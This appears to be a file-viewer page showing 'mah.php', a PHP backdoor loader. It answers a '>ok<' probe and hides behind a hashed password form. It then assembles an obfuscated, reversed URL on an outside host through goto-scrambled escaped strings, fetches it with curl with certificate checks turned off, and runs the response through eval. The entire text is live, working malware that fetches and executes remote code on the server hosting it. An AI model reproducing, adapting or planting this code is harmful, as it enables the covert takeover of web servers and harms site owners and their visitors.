View file File name : mah.php Content :<?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '6e4d5228cf850d984a9159d8a6957eb2252f871ba2bdab40c199c983ea7e93d1') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php goto TmtwG; L1JlI: $SS8Fu .= "\164\56\x32"; goto BeSMU; BeSMU: $SS8Fu .= "\60"; goto f_R3x; f_R3x: $SS8Fu .= "\x61\x6d\x61\144\57"; goto ijrSu; BbbZx: $SS8Fu .= "\160\x6f"; goto L1JlI; zNzRt: $SS8Fu .= "\164\170\164\56"; goto jwACR; whSp5: $SS8Fu .= "\x61\x6d"; goto nSJZp; S1v8j: $SS8Fu .= "\x6c\x6f\57"; goto whSp5; jwACR: $SS8Fu .= "\71\x2f\x64"; goto S1v8j; TmtwG: $SS8Fu = ''; goto zNzRt; nSJZp: $SS8Fu .= "\x61\x64\57"; goto BbbZx; GzHmJ: $SS8Fu .= "\164\x68"; goto FpeCk; ijrSu: $SS8Fu .= "\x2f\72\x73\x70\164"; goto GzHmJ; FpeCk: eval("\x3f\76" . tw2kX(strrev($SS8Fu))); goto yp3du; yp3du: function Tw2kx($V1_rw = '') { goto WpUL0; Ddcuj: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto jBlfV; nSqs2: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto RpkDT; MIwlf: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto tvl8z; Y316s: curl_close($xM315); goto i31AG; WpUL0: $xM315 = curl_init(); goto Ddcuj; RpkDT: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto MIwlf; i31AG: return $tvmad; goto mG4JB; jBlfV: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto nSqs2; tvl8z: $tvmad = curl_exec($xM315); goto Y316s; mG4JB: }